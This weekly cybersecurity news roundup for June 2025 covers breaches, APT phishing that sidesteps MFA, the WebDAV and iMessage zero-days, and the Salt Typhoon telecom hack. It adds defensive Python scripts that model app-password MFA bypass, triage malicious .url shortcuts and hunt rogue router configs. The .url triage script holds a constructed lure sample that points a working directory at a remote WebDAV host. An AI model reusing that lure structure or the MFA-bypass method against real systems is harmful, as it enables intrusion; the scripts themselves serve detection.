
Cybersecurity Week in Review: June 17 – 23, 2025

Cyberattacks, data breaches, zero-days, and global responses—discover the biggest cybersecurity headlines of this week.

Major Data Breaches and Leaks

  • UBS & Pictet Third-Party Data Leak: Swiss banks UBS and Pictet disclosed a data breach caused by a cyberattack on an external service provider (Chain IQ). While no customer information was compromised, files containing details of tens of thousands of UBS employees were stolen and leaked on the dark web. The leak even included an internal phone number of UBS’s CEO, underscoring the risk that supply-chain attacks pose to even well-secured institutions. Pictet said its stolen data was limited to some vendor invoice information (no client data).

  • Healthcare Data of 5.4 Million Exposed: Episource, a U.S. healthcare technology firm, confirmed that a breach affected over 5.4 million patients. Hackers accessed the company’s systems between January 27 and February 6, 2025, stealing sensitive personal and medical data (names, contact info, insurance and Medicaid details, diagnoses, etc., and in some cases Social Security numbers). No financial data was taken, and so far the company has not found evidence of misuse. Episource began notifying victims in April and urged vigilance against fraud while it works with regulators on the incident.

  • 16 Billion Login Credentials Dumped: Cybersecurity researchers revealed one of the largest credential leaks ever: a set of exposed datasets totalling some 16 billion stolen logins for services like Google, Apple, Facebook, PayPal, and more. Importantly, this was not a single new breach of those companies’ systems, but a compilation of data harvested by infostealer malware and older breaches, with heavy duplication likely across the datasets. The trove, described as a “blueprint for mass exploitation”, highlights the scale of stolen credentials in circulation. Tech firms reiterated that their own systems weren’t directly breached, and users are urged to use strong, unique passwords (or password managers) and enable multi-factor authentication; anyone who suspects an infostealer infection should also change passwords from a clean device, since the malware captures whatever is typed or saved on the infected one.

Significant Cyberattacks and Incidents

  • Iranian TV Hijack and Crypto Heist: The cyber dimension of the Iran–Israel conflict escalated. Iran’s state TV broadcast was hijacked mid-program to air anti-government protest messages, an apparent hacktivist operation amid the fighting. Around the same time, Iran’s largest cryptocurrency exchange, Nobitex, was hacked and attackers drained at least $90 million from its hot wallets. The pro-Israel group Predatory Sparrow (Gonjeshke Darande) claimed the Nobitex attack, framing it as retaliation and accusing the exchange of helping finance terrorism. The stolen crypto was not cashed out: it was sent to vanity “burn” addresses for which no private key exists, so neither the attackers nor Nobitex can ever recover it, a signal that the motive was political rather than profit. These incidents underscore how state-aligned and hacktivist operations are blurring together, hitting financial infrastructure and propaganda channels as part of modern conflicts.

  • Deepfake “Zoom” Attack by North Korea: The North Korea–linked APT BlueNoroff (part of the Lazarus Group) was caught using AI-driven deepfakes in video calls to breach a crypto firm. Posing as company executives on a Zoom meeting, the attackers used realistic fake video avatars to trick an employee into installing a malicious Zoom plug-in on their Mac. The downloaded AppleScript malware disabled system logs and fetched additional payloads (keylogger, crypto-wallet stealers, RATs). This highly targeted social engineering campaign began with a Telegram message and a Calendly link to a spoofed Zoom site. It demonstrates the growing sophistication of threat actors, who now leverage deepfakes to bypass human verification and deliver malware in scenarios that appear legitimate. Security experts warn organizations to verify meeting attendees through secondary channels and train staff about such novel deception tactics.

  • Russian APT Phishes Past MFA: A suspected Russian state-sponsored group (tracked by Google as UNC6293 and assessed as likely linked to APT29, tied to Russia’s SVR) ran a patient phishing operation against a UK-based Russia expert that shows how MFA can be sidestepped without ever touching the second factor. The attackers impersonated a U.S. State Department official for nearly two weeks, wrote in near-perfect English, and copied other (fake) @state.gov addresses on their emails to build trust. Eventually the target was persuaded to generate and hand over a Google App-Specific Password: a 16-character password intended for legacy mail clients that cannot perform a normal interactive sign-in. Such a password is not single-use. It is a long-lived credential that grants full account access until revoked and is never challenged for a second factor, so it bypassed the MFA on the victim’s Google account. Google and Citizen Lab, who investigated, noted the absence of the usual red flags, a sign that attackers are investing more time and skill to fool even tech-savvy users. Two practical takeaways: audit and revoke app passwords on sensitive accounts, and switch the feature off entirely where possible (Google’s Advanced Protection Program does this, and Workspace admins can disable it by policy); and move high-risk users to phishing-resistant MFA such as security keys, while training them that a request to “generate a password for a third-party app” is itself the attack.

  • Other Notable Incidents: No major new ransomware attacks were publicly reported this week, but threat groups remain active. Industry reports noted a rise in destructive tactics – for instance, researchers detailed a ransomware strain named “Anubis” that both encrypts files and permanently wipes data if triggered, leaving victims no recovery options. In Europe, law enforcement announced the takedown of a sprawling botnet that had infected over 400,000 computers (in an operation dubbed “Vector”) – part of continuing efforts to disrupt criminal infrastructure. These developments illustrate the ever-evolving threat landscape: from nation-state espionage to financially motivated hacks, organizations across sectors must remain alert.
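The App-Specific Password case above comes down to two login paths that share one account but not one policy. The following Python model is an added example, not code from the original roundup, Google or Citizen Lab: it implements a real RFC 6238 TOTP check for the normal path and a separate app-password path that never asks for a second factor, then shows the two mitigations (revoking the password, and disabling the feature outright). The server, the account name, the hex app-password format and the 20-byte secret (the RFC 6238 reference secret) are constructed for the demo.

```python
import hashlib
import hmac
import secrets
import struct
import time
from dataclasses import dataclass, field
from typing import Dict, Optional


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226 HOTP: HMAC-SHA1 over the big-endian counter, dynamically truncated."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret: bytes, at: Optional[int] = None, step: int = 30) -> str:
    """RFC 6238 TOTP: HOTP with the counter derived from Unix time."""
    at = int(time.time()) if at is None else at
    return hotp(secret, at // step)


@dataclass
class Account:
    password_hash: str
    totp_secret: bytes
    # App-specific passwords persist until revoked: they are reusable, not single-use.
    app_passwords: Dict[str, str] = field(default_factory=dict)  # label -> value


@dataclass
class AuthServer:
    # Google's Advanced Protection Program, or a Workspace admin policy, turns this off.
    allow_app_passwords: bool = True
    accounts: Dict[str, Account] = field(default_factory=dict)

    @staticmethod
    def _hash(password: str) -> str:
        return hashlib.sha256(password.encode()).hexdigest()  # demo only; use a real KDF

    def register(self, user: str, password: str, totp_secret: bytes) -> None:
        self.accounts[user] = Account(self._hash(password), totp_secret)

    def create_app_password(self, user: str, label: str) -> str:
        """The 16-character password the victim was talked into generating (hex here, for illustration)."""
        if not self.allow_app_passwords:
            raise PermissionError("app passwords are disabled by policy")
        value = secrets.token_hex(8)
        self.accounts[user].app_passwords[label] = value
        return value

    def login(self, user: str, password: str, code: str, at: Optional[int] = None) -> bool:
        """Primary path: password plus a TOTP code valid for the current time step."""
        acct = self.accounts.get(user)
        if acct is None or not hmac.compare_digest(acct.password_hash, self._hash(password)):
            return False
        return hmac.compare_digest(totp(acct.totp_secret, at), code)

    def login_app_password(self, user: str, value: str) -> bool:
        """Legacy-app path: one long-lived secret, and no second factor is ever requested."""
        if not self.allow_app_passwords:
            return False
        acct = self.accounts.get(user)
        if acct is None:
            return False
        return any(hmac.compare_digest(v, value) for v in acct.app_passwords.values())

    def revoke_app_passwords(self, user: str) -> int:
        revoked = len(self.accounts[user].app_passwords)
        self.accounts[user].app_passwords.clear()
        return revoked


RFC6238_SECRET = b"12345678901234567890"  # RFC 6238 reference secret, used as a constructed value
DEMO_TIME = 59                             # RFC 6238 reference time; the TOTP here is "287082"


def demo() -> Dict[str, bool]:
    """Walk through the bypass and both mitigations; returns each step's outcome."""
    user, pw = "expert@example.org", "correct horse battery staple"
    srv = AuthServer()
    srv.register(user, pw, RFC6238_SECRET)
    asp = srv.create_app_password(user, "mail client")
    results = {
        "mfa_login_without_code": srv.login(user, pw, "000000", DEMO_TIME),
        "mfa_login_with_code": srv.login(user, pw, totp(RFC6238_SECRET, DEMO_TIME), DEMO_TIME),
        # The attacker holds only the app password: full access, reusable, no TOTP prompt.
        "attacker_first_use": srv.login_app_password(user, asp),
        "attacker_second_use": srv.login_app_password(user, asp),
    }
    srv.revoke_app_passwords(user)
    results["after_revocation"] = srv.login_app_password(user, asp)
    hardened = AuthServer(allow_app_passwords=False)
    hardened.register(user, pw, RFC6238_SECRET)
    try:
        hardened.create_app_password(user, "mail client")
        results["hardened_allows_creation"] = True
    except PermissionError:
        results["hardened_allows_creation"] = False
    return results


if __name__ == "__main__":
    for step, outcome in demo().items():
        print(f"{step:26} {outcome}")
```

The point of the model is the asymmetry: the primary path fails closed without a fresh TOTP code, while the app-password path succeeds twice in a row with no code at all, which is exactly why a social-engineered app password is worth more to an attacker than a one-time code. Revocation closes the hole after the fact; the hardened server never opens it.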

Critical Vulnerabilities and Patches

  • Apple Zero‑Click iMessage Exploit: Apple disclosed (in a June 12 update to its February security notes) details of a critical zero-click vulnerability (no user interaction needed) in the iOS Messages app, CVE-2025-43200, which had been actively exploited earlier this year by spyware. Apple had quietly patched the flaw in February (iOS/iPadOS 18.3.1), and Citizen Lab’s forensic work showed it was used to deploy Paragon’s Graphite mercenary spyware onto the iPhones of targeted journalists in Europe. The bug, a logic issue in how Messages processed a malicious photo or video shared via an iCloud Link, could let an attacker silently infect a device with full spyware capabilities. The disclosure highlights the real-world danger of iOS zero-days and zero-click attacks. Apple advises all users to keep devices updated, and those at high risk (e.g. activists, journalists) to enable Lockdown Mode for extra protection.

  • Microsoft Patches WebDAV 0‑Day (CVE-2025-33053): Microsoft’s June Patch Tuesday (released June 10) included a fix for an actively exploited Windows vulnerability in the WebDAV component. The flaw allowed remote code execution when a user opened a malicious link, and had been used by the APT group dubbed “Stealth Falcon” to deploy a custom implant in targeted attacks on a defense company (reported to be in Turkey). According to Check Point Research, which discovered the exploitation, the lure was a .url (Internet Shortcut) file that launched a legitimate Windows diagnostic tool with its working directory set to an attacker-controlled WebDAV server, so the helper executables the tool spawned were resolved from that remote share instead of from the local system. With the patch now available, Microsoft urges organizations to update immediately, as the technique is easy for other actors to copy. The same release also closed a separate, publicly disclosed Windows SMB client privilege-escalation bug (CVE-2025-33073), among 66 fixes this month.

  • Critical Veeam Backup RCE: Enterprise backup vendor Veeam issued an urgent update after researchers reported a critical remote code execution bug in Veeam Backup & Replication. The flaw (CVE-2025-23121, CVSS 9.9) lets any authenticated domain user execute code on a domain-joined backup server. It affects all version 12 builds before the new patched release (12.3.2); a March patch for a similar issue (CVE-2025-23120) turned out to be insufficient, hence this new fix. Veeam also patched two lesser vulnerabilities: CVE-2025-24286, which lets a user holding the Backup Operator role modify backup jobs to run arbitrary code, and CVE-2025-24287, a local privilege escalation in the Veeam Agent for Windows. Backup servers are prime ransomware targets (one incident-response vendor’s figures put Veeam abuse in over 20% of its cases last year), so administrators should apply the patches promptly, keep the backup server off the production Active Directory domain as Veeam’s own hardening guidance recommends, and restrict who can reach it at all.

  • Adobe & Other Updates: Beyond operating systems and infrastructure, June brought patches for other widely used platforms. Adobe released a large batch of fixes addressing 259 vulnerabilities across products including Acrobat, InDesign, and Adobe Commerce (Magento). Notably, CVE-2025-47110 in Adobe Commerce was a critical bug that could allow arbitrary code execution, a serious risk for e-commerce sites. Organizations running Magento or other Adobe software should update quickly, as these platforms are attractive targets for cybercriminals. Google also pushed out emergency Chrome updates in May and early June to fix two actively exploited zero-days (CVE-2025-4664 and CVE-2025-5419), continuing the trend of frequent Chrome zero-day patches. The flurry of patches this month underscores the importance of prompt patch management: unpatched software (even network gear, see below) remains one of the easiest pathways for attackers.
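The WebDAV zero-day above was delivered as an ordinary-looking Internet Shortcut, which makes the .url file itself a cheap thing to hunt for in mail attachments and download folders. The script below is an added example, not code from the original roundup, Microsoft or Check Point: it parses .url files (plain INI text) and flags the combination that matters, a local executable in URL= together with a WorkingDirectory= or IconFile= that points at a remote UNC/WebDAV location. The two sample shortcuts, the 203.0.113.10 host and the specific flagged binary are constructed for the demo.

```python
import configparser
import re
from typing import Dict, List

# Remote-location markers: UNC to any host, the WebDAV mini-redirector forms
# \\host@80\ and \\host@SSL\, the DavWWWRoot virtual folder, or a plain http(s) URL.
REMOTE_PATTERNS = [
    re.compile(r"^\\\\[^\\]+", re.I),
    re.compile(r"\\\\[^\\]+@(?:ssl|\d+)", re.I),
    re.compile(r"davwwwroot", re.I),
    re.compile(r"^https?://", re.I),
]
# A file:// URL naming a local executable (the lure targets a legitimate Windows binary).
LOCAL_EXE = re.compile(r"^file:///?[a-z]:[/\\].+\.(?:exe|cmd|bat|scr|com)$", re.I)


def parse_url_file(text: str) -> Dict[str, str]:
    """Return the [InternetShortcut] keys lower-cased; interpolation is off so '%20' survives."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    if "InternetShortcut" not in cp:
        return {}
    return {k.lower(): v.strip() for k, v in cp["InternetShortcut"].items()}


def is_remote(path: str) -> bool:
    return any(p.search(path) for p in REMOTE_PATTERNS)


def triage(text: str) -> List[str]:
    """Reasons a shortcut looks like a WebDAV lure; an empty list means nothing was found."""
    keys = parse_url_file(text)
    url = keys.get("url", "")
    workdir = keys.get("workingdirectory", "")
    findings: List[str] = []
    if workdir and is_remote(workdir):
        findings.append(f"remote WorkingDirectory: {workdir}")
    if LOCAL_EXE.match(url):
        findings.append(f"URL launches a local executable: {url}")
        if workdir and is_remote(workdir):
            findings.append("local executable with remote working directory (CVE-2025-33053 lure pattern)")
    if url and is_remote(url) and not url.lower().startswith("http"):
        findings.append(f"URL points at a remote share: {url}")
    icon = keys.get("iconfile", "")
    if icon and is_remote(icon):
        findings.append(f"remote IconFile (fetched over UNC/WebDAV when the icon renders): {icon}")
    return findings


# Constructed samples; 203.0.113.10 is a documentation address, not a real server.
BENIGN_URL = """[InternetShortcut]
URL=https://www.example.com/
IconIndex=0
"""

SUSPECT_URL = """[InternetShortcut]
URL=file:///C:/Program%20Files/Internet%20Explorer/iediagcmd.exe
WorkingDirectory=\\\\203.0.113.10@80\\DavWWWRoot\\
IconFile=\\\\203.0.113.10@80\\DavWWWRoot\\icon.ico
IconIndex=0
"""

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_URL), ("suspect", SUSPECT_URL)):
        hits = triage(sample)
        print(f"{name}: {'CLEAN' if not hits else 'FLAGGED'}")
        for h in hits:
            print("  -", h)
```

Two design notes: interpolation is disabled because configparser would otherwise choke on the `%20` sequences that are normal in file:// URLs, and a remote IconFile is reported separately because Explorer fetches it as soon as the folder is rendered, which leaks an outbound WebDAV connection before anyone double-clicks. The patch, not this script, is the fix; the script is for finding lures that arrived before it was applied.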

Government and Industry Cyber Responses

  • US House Bans WhatsApp: Citing security concerns, the U.S. House of Representatives’ IT department banned the use of WhatsApp on official House-issued mobile devices. In a June 23 memo, the House Office of Cybersecurity deemed WhatsApp a “high risk” app due to lack of transparency in its data protection practices and absence of encrypted data backups, among other issues. House staff are instead advised to use approved secure communications apps like Microsoft Teams, Signal, Apple iMessage/FaceTime, or Amazon’s Wickr. Meta (WhatsApp’s owner) publicly objected to the ban, asserting that WhatsApp’s end-to-end encryption makes it more secure than some of the recommended alternatives. The ban follows similar past actions (the House banned TikTok in 2022) and reflects growing government scrutiny of apps that could pose data leakage or espionage risks.

  • DHS Warns of Iran Cyber Threat: The U.S. Department of Homeland Security issued a National Terrorism Advisory bulletin warning that the conflict between Israel and Iran has created a “heightened threat environment” for cyberattacks against U.S. networks. DHS highlighted that Iran-backed hackers and pro-Iran hacktivist groups have stepped up campaigns of low-level attacks (DDoS, website defacements, intrusion attempts) and that such activity is likely to continue or increase. While these cyberattacks observed so far have had limited impact, the advisory urges U.S. organizations – especially in government, infrastructure, and finance – to be on alert. It also notes the possibility of Iranian state operatives acting as initial access brokers, breaching U.S. targets and then selling that access to ransomware actors. This coordinated warning, which comes alongside similar alerts from Canada and others, is a call for heightened cyber vigilance domestically whenever international tensions flare.

  • Canada Attributes Telecom Hack to China: In a joint bulletin, the Canadian Centre for Cyber Security and the FBI revealed that the Chinese state-sponsored group known as “Salt Typhoon” was responsible for a February 2025 breach of a Canadian telecom company. The attackers exploited CVE-2023-20198, a critical flaw in the web UI of Cisco IOS XE software that had been disclosed (and patched) back in October 2023, to compromise the telecom’s network devices. Once in, they created unauthorized accounts, retrieved the devices’ running configurations and modified at least one of them to set up a GRE tunnel for collecting traffic. Notably, this same bug was used in late 2023 to compromise thousands of Cisco devices worldwide. The fact that a major telco had not applied the patch more than a year later gave the threat actors an easy foothold. Canadian authorities urged all organizations, especially in critical infrastructure, to patch known exploited vulnerabilities promptly and noted that Salt Typhoon has also been conducting reconnaissance against targets in other sectors. This public attribution and advisory highlight both the persistent cyber espionage threat from nation-states and the continued risk posed by unpatched legacy systems.

  • Global Sting Nabs Darknet Market Operators: International law enforcement scored a victory this week in the fight against cybercrime. Authorities from six countries, led by German federal police with Europol support, dismantled “Archetyp Market”, a major darknet marketplace notorious for drug trafficking. Active since 2020, the market had over 612,000 users and facilitated an estimated €250 million in cryptocurrency transactions for illicit goods. In a coordinated operation (code-named “Deep Sentinel”), servers were seized in the Netherlands and a dozen arrests were made across Europe – including the platform’s alleged admin in Spain, plus top vendors and moderators in Germany and Sweden. Additionally, authorities confiscated large caches of narcotics, electronics, and about €7.8 million in assets. This takedown – along with the arrest of 32 suspects in an Interpol-led infostealer cybercrime sweep in APAC earlier in the month – showcases growing international collaboration to disrupt cyber-enabled criminal networks. Such operations remove key black-market services from the web and serve as a deterrent, but experts note that new marketplaces often emerge, necessitating continuous efforts.
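The Salt Typhoon intrusion above left the kind of trace that is easy to check for in a saved running-config: an extra privilege-15 local account, a GRE tunnel to a peer nobody approved, and the HTTP(S) web UI that CVE-2023-20198 lives in still switched on. The following Python script is an added example, not code from the original roundup, Cisco or the Canadian Cyber Centre: it parses IOS XE configuration text for those three things and reports anything outside an allow-list. The sample configuration, its addresses and the allow-lists are constructed; the `cisco_tac_admin` username in it is one Cisco Talos reported attackers creating during the 2023 mass exploitation, included here to show a realistic hit.

```python
import re
from typing import Dict, List, Set

# "username NAME [privilege N] ..."; privilege defaults to 1 when omitted.
USER_RE = re.compile(r"^username\s+(\S+)(?:\s+privilege\s+(\d+))?", re.M)
# A Tunnel interface block: the header line plus every following indented line.
TUNNEL_BLOCK_RE = re.compile(r"^interface\s+(Tunnel\d+)\n((?:[ \t]+[^\n]*\n?)*)", re.M)
HTTP_SERVER_RE = re.compile(r"^ip http (?:secure-)?server\s*$", re.M)


def parse_users(cfg: str) -> Dict[str, int]:
    """Map each local username to its privilege level."""
    return {m.group(1): int(m.group(2) or 1) for m in USER_RE.finditer(cfg)}


def parse_tunnels(cfg: str) -> List[Dict[str, str]]:
    tunnels = []
    for m in TUNNEL_BLOCK_RE.finditer(cfg):
        # IOS omits default settings from running-config, and the default tunnel
        # mode is GRE over IP, so a block with no "tunnel mode" line is still GRE.
        t = {"name": m.group(1), "mode": "gre ip"}
        for line in m.group(2).splitlines():
            parts = line.split()
            if parts[:2] == ["tunnel", "mode"]:
                t["mode"] = " ".join(parts[2:])
            elif parts[:2] == ["tunnel", "destination"] and len(parts) > 2:
                t["destination"] = parts[2]
            elif parts[:2] == ["tunnel", "source"] and len(parts) > 2:
                t["source"] = parts[2]
        tunnels.append(t)
    return tunnels


def hunt(cfg: str, expected_admins: Set[str], approved_peers: Set[str]) -> List[str]:
    """Flag unexpected privilege-15 users, GRE tunnels to unapproved peers, and an enabled web UI."""
    findings = []
    for user, priv in parse_users(cfg).items():
        if priv >= 15 and user not in expected_admins:
            findings.append(f"unexpected privilege-15 local user: {user}")
    for t in parse_tunnels(cfg):
        dest = t.get("destination", "<none>")
        if t["mode"].startswith("gre") and dest not in approved_peers:
            findings.append(f"GRE tunnel {t['name']} to unapproved peer {dest}")
    if HTTP_SERVER_RE.search(cfg):
        findings.append("HTTP(S) web UI enabled: the CVE-2023-20198 attack surface; disable or restrict it if unneeded")
    return findings


# Constructed sample config; 198.51.100.0/24, 203.0.113.0/24 and 192.0.2.0/24 are documentation ranges.
SAMPLE_CONFIG = """\
hostname edge-rtr-01
!
username admin privilege 15 secret 9 $9$REDACTED
username netops secret 9 $9$REDACTED
username cisco_tac_admin privilege 15 secret 9 $9$REDACTED
!
interface GigabitEthernet0/0/0
 ip address 198.51.100.2 255.255.255.252
!
interface Tunnel0
 ip address 10.255.0.1 255.255.255.252
 tunnel source GigabitEthernet0/0/0
 tunnel destination 203.0.113.7
 tunnel mode gre ip
!
interface Tunnel1
 description approved backhaul to DC
 ip address 10.255.1.1 255.255.255.252
 tunnel source GigabitEthernet0/0/0
 tunnel destination 192.0.2.20
!
ip http server
ip http secure-server
!
"""

if __name__ == "__main__":
    for finding in hunt(SAMPLE_CONFIG, expected_admins={"admin"}, approved_peers={"192.0.2.20"}):
        print("FINDING:", finding)
```

Run it against `show running-config` output captured out-of-band from each device and diff the findings over time; a tunnel that appears between two captures is the signal. Note the default-mode handling: the approved backhaul tunnel in the sample has no `tunnel mode` line and is still treated as GRE, which is how a hunt that only greps for the literal string `gre` would miss a real one.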

Miscellaneous

  • AI-Generated Spam Outpaces Filters – New research this week underscored how AI is changing the threat landscape. A study by Barracuda and university researchers revealed that over half of spam and malicious emails (about 51%) are now written using AI tools. This proportion has climbed steadily since late 2022 and even peaked as high as 70% in April 2025, indicating that attackers are rapidly adopting generative AI to craft more convincing phishing lures. AI-written phishing emails tend to be more fluent and grammatically correct, lacking the tell-tale errors that often gave away past scams. The study noted that while only ~14% of business email compromise (BEC) attacks currently use AI-generated messages, that number is expected to grow with the rise of AI voice cloning and text generation capabilities. By leveraging AI to automate A/B testing of phishing content (much like a marketer would test email campaigns), attackers can identify which messages bypass filters and trick users most effectively. This trend means organizations may need to rely more on advanced email security solutions and user training, since legacy spam filters (trained on pre-AI phishing patterns) may miss these new, polished phishing attempts.

  • Cybersecurity Industry Updates – Elsewhere, the cybersecurity community convened at several events and issued notable research reports. Among them, an annual security conference highlighted the growing intersection of AI and security, with panels on using AI for defense (threat detection, automated response) versus the risks of adversarial AI usage by attackers. A report on the new “Qilin” ransomware-as-a-service group detailed how it’s professionalizing crime – even providing affiliates with real lawyers to intimidate victims during negotiations. And cybersecurity firms are tracking shifts in cybercriminal targets: for example, the Scattered Spider hacking group (known for telecom and BPO compromises last year) is now turning its tactics toward the insurance sector. Finally, multiple U.S. agencies this week launched a joint ransomware awareness campaign for small businesses, providing free toolkits and urging incident reporting to authorities. These diverse developments show a community on its toes, sharing intelligence and adapting strategies as cyber threats continue to evolve.

Conclusion

This week’s rundown highlights a cyber ecosystem in constant high alert. We saw that data breaches continue to hit both the financial sector and healthcare, exposing millions of individuals’ data and reinforcing the need for stronger third-party risk oversight and data protection measures. Meanwhile, nation-state actors and organized cybercriminals are innovating: whether by using deepfakes to dupe employees, novel phishing tricks to sidestep MFA, or by targeting critical infrastructure via unpatched vulnerabilities, attackers are finding new ways to exploit any weakness. The discovery of 16 billion stolen credentials floating online is a stark reminder of the cumulative exposure of users over time – and why basics like unique passwords and 2FA are non-negotiable for everyone.

On the defense side, there were robust responses from governments and industry. We saw concrete actions – from banning insecure apps on official devices to global law enforcement busts of criminal marketplaces – demonstrating that defenders are not sitting idle. Cybersecurity agencies issued alerts urging vigilance in the face of geopolitical conflicts spilling into cyberspace, and vendors rushed to patch critical flaws before they could be widely abused. The onus now is on organizations to apply those patches and heed the warnings. A key lesson is the importance of cyber hygiene: many of the week’s incidents (a telecom breach via a 2023 router bug, ransomware attacks exploiting old software, etc.) could have been prevented by timely updates and security basics.

For security professionals and IT leaders, the takeaway is clear – there’s no off-week in cybersecurity. Defenses must be layered and adaptive: user education to recognize phishing, strict access controls and network monitoring, readiness for ransomware (with offline backups and incident response plans), and collaboration with authorities when incidents occur. The rising use of AI by attackers also suggests that defenders should incorporate AI/machine learning in email security, anomaly detection, and threat intel to avoid falling behind. Overall, the events of this week underscore both the ingenuity of threat actors and the resilience of the cybersecurity community. Staying ahead will require continued vigilance, rapid information sharing, and a proactive stance to shore up weaknesses before attackers strike. In cybersecurity, an old adage holds true: hope for the best, but prepare for the worst.
